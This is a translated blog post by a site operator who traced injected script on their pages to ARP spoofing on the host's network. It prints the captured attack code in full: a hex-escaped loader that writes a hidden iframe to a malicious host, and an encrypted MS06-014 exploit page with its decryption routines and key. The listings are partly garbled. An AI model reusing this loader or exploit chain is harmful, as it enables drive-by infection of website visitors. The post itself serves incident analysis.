Hexadecimal (\x) escape obfuscation that the JavaScript runtime decodes automatically _ network security

Source: Internet
Author: User
When I checked the page source, I found that a line had been added at the top of the page: <script src=http://1.520sb.cn/1.js></script>
But this code did not always appear.
I thought the server had been attacked, or that there was a virus on the server.
I checked all the pages and related files where it had occurred:
nothing abnormal was found,
and the server showed no signs of intrusion either.

I downloaded this JS file locally and opened it; it contained the following code:
/*
 * Injected loader as recovered from 1.js: three window["document"]["writeln"] calls whose
 * property names and string arguments are written entirely as \xNN escape sequences, which
 * the JS engine decodes at parse time (the decoded form is shown further down this page:
 * two DIVs whose CSS cursor:url() points at .jpg files on the same host, and a 0x0 iframe).
 * Note: this listing is a transcription. Stray spaces inside escapes ("\ x65", "\ '"),
 * the upper-case "\X" sequences, and the trailing "\/\/" appear to be copy artefacts and
 * would not decode to exactly the intended strings if run as written.
 */
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x44\x49\x56 \x73\x74\x79\x6c\ x65\x3d\ "\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\ ' \x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\ X2e\x63\x6e\/\x6d\x61\/\x31\x2e\x6a\x70\x67\ ' \x29\ "\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x44\x49\x56 \x73\x74\x79\x6c\ x65\x3d\ "\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\ ' \x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\ X2e\x63\x6e\/\x6d\x61\/\x32\x2e\x6a\x70\x67\ ' \x29\ "\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x69\x66\x72\x61\x6d\x65 \x73\ X72\X63\X3D\X68\X74\X74\X70\X3A\/\/\X31\X2E\X35\X32\X30\X73\X62\X2E\X63\X6E\/\X74\X6A\X2E\X68\X74\X6D \x77\x69\ x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e ")

This is hexadecimal escaping: because the JavaScript runtime automatically decodes the \x escape sequences, the embedded code runs automatically as soon as the web page is opened.
Using a document.write statement to print this code to the page, the decoded code is:
window["Document" ["Writeln"] ("<div style=" Cursor:url (' yun_qi_img/1.jpg ') ">"); window["Document"] ["Writeln "] (" <div style= "Cursor:url (' yun_qi_img/2.jpg ')" ></DIV></DIV> "); window[" Document "[" Writeln "] ( "<iframe src=http://1.520sb.cn/tj.htm width=0 height=0></iframe>")

Http://1.520sb.cn/ma/1.jpg and http://1.520sb.cn/ma/2.jpg are two Trojan files (I did not examine them in detail); http://1.520sb.cn/tj.htm contains a visitor counter and an MS06-014 exploit script, http://1.520sb.cn/mm/06014.htm

The content of http://1.520sb.cn/mm/06014.htm is:
<script language =javascript>
/*
 * Utf8to16(str): decodes a UTF-8 "byte string" (one byte per char code) into a UTF-16
 * JavaScript string. It switches on the high nibble of each byte: 0x0-0x7 copy the byte
 * as-is, 0xC/0xD consume one continuation byte (2-byte sequence), 0xE consumes two
 * (3-byte sequence). There is no default branch, so 4-byte sequences and invalid lead
 * bytes are silently dropped. The listing's case and spacing are corrupted
 * ("I<len", "Case", "Return Out.join (")"), so it does not parse as written.
 */
function Utf8to16 (str) {var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while (I<len) {c=str.charcodeat (i++); switch (c>>4)
{Case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charat (i-1); Break;case 12:case 13:char2= Str.charcodeat (i++); Out[out.length]=string.fromcharcode ((c&0x1f) <<6) | ( char2&0x3f)); Break;case 14:char2=str.charcodeat (i++); Char3=str.charcodeat (i++); out[out.length]= String.fromCharCode ((c&0x0f) <<12) | ( (char2&0x3f) <<6) | ((char3&0x3f) <<0)); Break;}}
Return Out.join (");}
/*
 * base64decodechars: 128-entry lookup table indexed by ASCII code for the standard base64
 * alphabet: 62 at index 43 ('+'), 63 at index 47 ('/'), 52-61 at 48-57 ('0'-'9'),
 * 0-25 at 65-90 ('A'-'Z'), 26-51 at 97-122 ('a'-'z'), -1 for every other byte.
 * The "- 1" entries with a stray space are transcription artefacts.
 */
var base64decodechars=new Array ( -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1 , -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,- 1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,- 1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
/*
 * Base64decode(str): standard base64 decoder returning a byte string. Each group reads up
 * to four table values (c1..c4) via base64decodechars, skipping any byte that maps to -1;
 * a '=' (code 61) in the third or fourth position returns the output accumulated so far,
 * and running out of input at any position ends the loop. Each full group emits three
 * chars: (c1<<2 | c2>>4), ((c2&0xf)<<4 | c3>>2), ((c3&3)<<6 | c4).
 * Corrupted in transcription: "I<len", "string.fromcharcode", "d o" (= "do"), "Return".
 */
function Base64decode (str)
{var C1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = ""; while (I<len)
{Do
{c1=base64decodechars[str.charcodeat (i++) &0xff]}while (i<len&&c1==-1); if (c1==-1)
Break;do
{c2=base64decodechars[str.charcodeat (i++) &0xff]}while (i<len&&c2==-1); if (c2==-1)
Break;out+=string.fromcharcode ((c1<<2) | ( (c2&0x30) >>4));d o
{c3=str.charcodeat (i++) &0xff;if (c3==61)
Return Out;c3=base64decodechars[c3]}while (I<len&&c3==-1); if (c3==-1)
Break;out+=string.fromcharcode ((c2&0xf) <<4) | ( (c3&0x3c) >>2));d o
{c4=str.charcodeat (i++) &0xff;if (c4==61)
Return Out;c4=base64decodechars[c4]}while (I<len&&c4==-1); if (c4==-1)
Break;out+=string.fromcharcode (((c3&0x03) <<6) |c4)}
Return out}
/*
 * Long2str(v, w): converts an array of 32-bit words back into a byte string, low byte
 * first (little-endian), by overwriting each v[i] with a 4-char string and joining.
 * When w is true the last word is read up front as the original byte length (sl) and
 * the joined result is truncated to it — the counterpart of Str2long(s, true).
 * "&GT;"/"&AMP;" are HTML-escaped ">" and "&" from the transcription; join (") is join('').
 */
function Long2str (v,w) {var vl=v.length;var sl=v[vl-1]&0xffffffff;for (var i=0;i<vl;i++)
{V[i]=string.fromcharcode (v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>> &GT;24&AMP;0XFF);}
if (w) {return V.join ("). substring (0,SL);}
Else{return V.join (');}
/*
 * Str2long(s, w): packs a byte string into 32-bit words, four chars per word, low byte
 * first (little-endian). When w is true the byte length is appended as one extra word so
 * Long2str(v, true) can strip padding later. Note: charCodeAt past the end yields NaN,
 * which the bitwise ops coerce to 0, so a trailing partial word is zero-padded.
 */
function Str2long (s,w) {var len=s.length;var v=[];for (var i=0;i<len;i+=4)
{v[i>>2]=s.charcodeat (i) |s.charcodeat (i+1) <<8|s.charcodeat (i+2) <<16|s.charcodeat (i+3) < <24;}
if (w) {V[v.length]=len;}
return v;}
/*
 * Xxtea_decrypt(str, key): XXTEA (Corrected Block TEA) decryption of a byte string.
 * Both str and key are packed into 32-bit words with Str2long(.., false); n = last word
 * index; delta is the TEA constant 0x9e3779b9; the number of rounds q = floor(6 + 52/(n+1))
 * sets sum = q*delta, and each round walks p from n down to 1 (then word 0) subtracting
 * mx = (z>>>5^y<<2) + (y>>>3^z<<4) ^ (sum^y) + (k[p&3^e]^z) from v[p], with e = sum>>>2&3.
 * The result goes through Long2str(v, true), i.e. the plaintext's last word is treated as
 * its byte length. The key selector k[p&3^e] expects four key words (128 bits); the 9-byte
 * key used at the call site below packs into only three, so k[3] is undefined and the ^
 * coerces it to 0 — the code still "works" because encryptor and decryptor share the bug.
 * Transcription damage: "Mx,e Q=" (= "mx,e,q="), "&AMP;", upper-cased identifiers.
 */
function Xxtea_decrypt (Str,key) {if (str== "") {return "";}
var v=str2long (str,false); var k=str2long (key,false); var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9e3779b9;var Mx,e Q=math.floor (6+52/(n+1)), Sum=q*delta&0xffffffff;while (sum!=0) {e=sum>>>2&3;for (var p=n;p>0; p--) {z=v[p-1];mx= (z>>>5^y<<2) + (y>>>3^z<<4) ^ (sum^y) + (k[p&3^e]^z); y=v[p]=v[p]- MX&AMP;0XFFFFFFFF;}
z=v[n];mx= (z>>>5^y<<2) + (y>>>3^z<<4) ^ (sum^y) + (k[p&3^e]^z);y=v[0]=v[0]-mx& 0XFFFFFFFF;SUM=SUM-DELTA&AMP;0XFFFFFFFF;}
Return Long2str (v,true);}
/*
 * Encrypted payload stage: T holds the base64 ciphertext; it is decoded, XXTEA-decrypted
 * with the literal key passed below, UTF-8-decoded, and written straight into the document.
 * The page text above identifies the plaintext as an MS06-014 exploit; it is not decoded
 * here. The spaces inside the base64 blob and the lower-cased key at the call site are
 * transcription artefacts, so this listing would not decrypt correctly as written.
 * Detection note for defenders: the markers worth matching are the unusual
 * base64 -> XXTEA -> document.write chain and the 0x9e3779b9 constant, not the blob itself.
 */
T= "wxvgrqsvcfufj2q0uffattocaf7jqxbkzv5bkcf0dq/y74mvvpn26a0t/ivhny4yh4ryyiac/vds3fyve81yhk1bjvx1apl4nhpl/ rnned15lbz+ymhdixfcqnlw5tl5fe/bm63gedjh7hk3lks0phvie1b12g3fdnkwc2+mgnulhuxa4+iyle+ns68c7h4ynayz++0kv/ Pj5jtzwlqb9vurmblzgtr1kvs6lwzbz5t7lqiwemc75crmenbaon4kcbnpioi78chxvuquicbosdbj5kcbldnsuh6xsuzsgjfbefwemap4ipqyh /9xhlz7r18whnfb2sdry116kkzowlwv9jaqrx5megpdqtxgbwkr9mcdmzwxdej+vyhbnt9c/wnrah7gq/ 1ffvbasmwimyteb0cj7ba9uqccvguxb9xrrkjmd/qx6jgmuhashgxcr3t9jlk+tdlolnuvgw8dfnnv0orm403xi52orstdotkj+h+ jxujwc8glz5nsy4av4fokst567oab45ksk9fcrwgkv3vohisdrssfaiveugj+ 4mgz5k9jdlhvmxaitumnbe5pzxiapexetz0pliqk80xfipcb5qy/cdhsehb5l0ctl2jdsavlc9ve02hdiai7isaahlbgmtbh2s7tnhqh/ ifhzpf898hpkbdm5nf2siuuirytdlxb7kzhjruyrwu+ew715ryhscqqhew9jztcxsh25mpbqkw/2qbusz6dil36ljcly8l/aro7aqyisfeoa8h /0+85zac5o2pw6dbwysnrjdcoamnlctwjncvkbaol7b7kwkwascw3l+17fogiku9l+qs1z1bmbdzqdsk98fnwovi/lq9jkew8tp6bqzzy6un+ 4ozgxanpquyzrq2cqajxrxlxzabdj9bq1n/2edvkjyfgsrfqwafe4owxs7a11webe9kur3/p5lp3g/e4opt0qvjut+nlf3rcuf9eew+3l/ Opr8kvzbouokv5bhwxiwlkf/hhhk3yegmpao6ujlfkmlrohoznyai1/odngziqc61fe2m/ Kbdowuwx8tnmh16wb5uf3g2nz3m6ma13kjequs9hthzgrimk5ysxhs5e0ludet04hstxz81rvhkivtit ";
T=utf8to16 (Xxtea_decrypt (Base64decode (t), ' Fuckjapan '));
document.write (t);
</script>

A record of what was found:
Because no signs of intrusion had been found in the server's configuration, I searched the internet for "520SB" and saw someone say: what you describe is a kind of ARP sniffer hijack. Packets sent to the gateway are hijacked in transit, mainly because a computer on the intranet has been compromised and uses ARP spoofing to insert code at certain points in the traffic. Even a simple HTML page gets the code added. Because ARP spoofing is unreliable, the hijack does not succeed every time.
Oh. A customer had run into this once before; the cause turned out to be exactly this, so reinstalling the system was useless — finding that compromised computer is the key.
Http://www.im286.com/archiver/tid-1886972.html
Http://linux.chinaunix.net/bbs/thread-886420-4-1.html
So the problem lies in the server's LAN.

I remembered that the hosting provider ("million net") offers a small tool that binds the gateway's IP and MAC address to prevent ARP spoofing, so I quickly downloaded and ran it; it reported that the binding succeeded,
but when I refreshed the website the injected virus code was still there.

I called the hosting provider and got a definite answer that it was ARP spoofing; they said they would check the problematic host by next Monday, and asked me to download their MAC-binding tool — which was the same small program I had already run — then restart and observe.

So far the problem seems to have been resolved; I am recording the above for reference.

Because this blog is on the same server, friends who visited it this week should update their antivirus software promptly and run a scan; if this caused you any loss, I can only apologize deeply.

ps:520sb.cn Domain name Everyone is a Pant of SB, look at this domain name will know.
